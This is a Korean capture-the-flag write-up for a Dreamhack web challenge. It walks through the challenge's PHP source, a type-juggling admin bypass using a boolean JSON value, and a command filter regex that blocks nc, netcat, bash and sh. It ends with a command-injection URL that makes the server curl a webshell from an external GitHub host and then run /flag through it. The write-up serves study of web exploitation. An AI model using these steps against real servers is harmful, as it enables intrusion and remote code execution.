[Dreamhack] Level 3: Switching Command

1. 문제

https://dreamhack.io/wargame/challenges/1081

Switching Command

2. 해결 과정

(1) 문제 페이지 접속

- username을 입력하는 form 화면이 뜬다. 

 

아무 정보나 입력할 경우 fail 화면이 보인다. 

입력값을 통해 JSON 데이터를 파싱해오는 문제로 보인다. 

 

(2) 문제 파일 다운로드 

 

flag.c

플래그는 flag.c 파일을 실행시키면 출력되어 확인할 수 있다. 

#include <stdio.h>
 
void main()
{
    puts("DH{**fake_flag**}\n");
}

 

실제로 도커 파일을 확인해보면 flag.c 파일을 루트 디렉토리에 복사한 뒤 실행 파일을 생성한 것을 확인할 수 있다. (읽기 쓰기 x)

즉, 우리는 플래그를 얻기 위해서는 루트 디렉토리의 플래그 실행 파일을 실행시켜야 한다. 

 

FROM php:8.0-apache
 
RUN apt-get update && \
    apt-get upgrade -y && \
    apt-get install -y gcc curl netcat-traditional
 
RUN docker-php-ext-install mysqli
 
COPY ./deploy/src /var/www/html/
 
COPY ./flag.c /flag.c
RUN gcc /flag.c -o /flag && \
    chmod 111 /flag && \
    rm /flag.c
 
EXPOSE 80

 

index.php 

1. "username" 필드를 JSON으로 파싱
2. JSON에서 username 속성 추출
3. username === "admin" : 엄격한 비교 연산자 - 타입까지 일치할 경우,  "no hack" 메시지 출력 후 break
4. switch 문에서 username을 다시 검사
   • "admin"일 경우, admin 권한 부여
   • 다른 값일 경우, guest 권한 부여

if ($_SERVER["REQUEST_METHOD"]=="POST"){
    $data = json_decode($_POST["username"]);
 
    if ($data === null) {
        exit("Failed to parse JSON data");
    }
        
    $username = $data->username;
 
    if($username === "admin" ){
        exit("no hack");
    }
 
    switch($username){
        case "admin":
            $user = "admin";
            $password = "***REDACTED***";
            $stmt = $conn -> prepare("SELECT * FROM users WHERE username = ? AND password = ?");
            $stmt -> bind_param("ss",$user,$password);
            $stmt -> execute();
            $result = $stmt -> get_result();
            if ($result -> num_rows == 1){
                $_SESSION["auth"] = "admin";
                header("Location: test.php");
            } else {
                $message = "Something wrong...";
            }
            break;
        default:
            $_SESSION["auth"] = "guest";
            header("Location: test.php");
    }
}

 

test.php

• auth === "admin" : admin인지 검사
• 필터링 (flag|nc|netcat|bin|bash|rm|sh)
  • /i: 대소문자 구분 X
  • \b: 단어 경계로 끝나야 함
  • \n : 줄바꿈 방지 (공백으로 처리)
  • preg_match 함수를 통해 $sanitized_command(사용자 입력 명령어)에서 패턴이 발견되면 true를 반환하고, "No hack" 메시지를 출력하고 스크립트를 종료한다.
• escapeshellcmd(): 명령어에 포함되어있는 쉘에서 특별한 의미를 가질 수 있는 문자들을 이스케이프한다. 
  • cmd를 통해 GET 요청을 받은  명령어를 shell_exec()로 실행하고 결과를 $resulttt 변수에 저장한다.
  • 이때 admin의 경우, 변수명이 resulttt이고 HTML 출력에서는 result를 사용하기 때문에 결과가 화면에 정상적으로 출력되지 않는다. 즉, 실행은 되지만 실행 결과를 확인할 수 없다. 
  • 만약 test.php에서 실행 결과가 정상적으로 보여진다면 단순히 필터링을 우회해서 flag를 실행시키면 되지만, 실행만 되고 결과는 보이지 않기 때문에 다른 방법을 고안해야 한다. 
• auth === guest 인 경우에는 "echo hi guest" 문자열을 result에 전달하여 명령어를 실행해 문자열을 출력한다. (임의 명령문 실행 불가능)

<?php
 
include ("./config.php");
 
$pattern = '/\b(flag|nc|netcat|bin|bash|rm|sh)\b/i';
 
if($_SESSION["auth"] === "admin"){
 
    $command = isset($_GET["cmd"]) ? $_GET["cmd"] : "ls";
    $sanitized_command = str_replace("\n","",$command);
    if (preg_match($pattern, $sanitized_command)){
        exit("No hack");
    }
    $resulttt = shell_exec(escapeshellcmd($sanitized_command));
}
else if($_SESSION["auth"]=== "guest") {
 
    $command = "echo hi guest";
    $result = shell_exec($command);
 
}
 
else {
    $result = "Authentication first";
}
?>
 
<!DOCTYPE html>
<html>
<head>
    <title>Command Test</title>
</head>
<body>
    <h2>Command Test</h2>
    <?php
    echo "<pre>$result</pre>";
    ?>
</body>
</html>

 

 

이 문제의 제목과 설명에서 약간의 스포??가 있었는데 바로 이 잘못된 출력 코드에 대한 것이다. 

Not Friendly service... Can you switching the command?

 

따라서 필터링 우회를 통해서 admin 권한을 얻고, 화면에 정상적으로 Result가 출력되도록 해야 한다. 

 

(3) 익스플로잇

먼저 필터링은 대소문자 구분 등이 적용되어있기 때문에 {"username":Admin} 등과 같이 우회하고자 하면 게스트로 접근된다. 

따라서 다른 우회 방법을 고려해야 한다. 

 

 

필터링은 if문과 switch 문으로 이루어져 있다. 

이때, PHP의 switch - case 문은 느슨한 비교를 사용한다. 

[참고] https://php.365ok.co.kr/control-structures.switch.php

    if($username === "admin" ){
        exit("no hack");
    }
 
    switch($username){
        case "admin":

즉,  필터링은 1) === 엄격한 비교 (타입도 동일한 경우에만 걸림) 2) = 느슨한 비교를 수행하고 있다.

따라서 엄격한 비교를 우회하기 위해서는 타입을 다르게 해서 false를 만들어내고, 2번째 느슨한 비교 우회에서는 이전에 다뤄본적있던 

type juggling 취약점을 익스플로잇하여 true를 만들면 된다. 

 

위와 같이 문자열과 true를 비교하면 true를 반환하게 되므로 이를 이용해서 {"username":true}를 입력하면

아래의 이유로 admin 권한을 얻을 수 있을 것이다. 

1. true === "admin"은 타입이 다르므로(불리언 vs 문자열) false 리턴 -> switch문 진입 
2. switch($username): 문자열과 true 비교 -> true 반환 

 

어드민 권한을 얻었으므로, 화면에 결과는 보지 못하지만 원하는 명령어를 실행할 수 있는 권한을 가지게 된다. 

이럴떄에는 웹쉘을 업로드하는 명령어를 실행시킨 뒤, 웹쉘을 통해 원하는 명령어를 실행하고 결과를 확인하면 된다. 

 

따라서 웹쉘을 업로드한 뒤, 해당 경로로 이동해서 flag파일을 실행하여 결과를 확인할 것이다. 

먼저 curl 을 이용해서 간단한 웹쉘을 업로드 해준다

/test.php?cmd=curl%20https://raw.githubusercontent.com/mnzy412/webshell/refs/heads/main/webshell%20-o%20shell.php

 

이후 /shell.php 로 이동해주면 업로드한 웹쉘이 실행된 것을 확인할 수 있다.

 

실제로 루트 디렉토리 아래에 flag 실행 파일이 존재하는 것 또한 확인할 수 있다.

 

따라서, /flag 를 입력하여 실행해주면 플래그를 확인할 수 있다.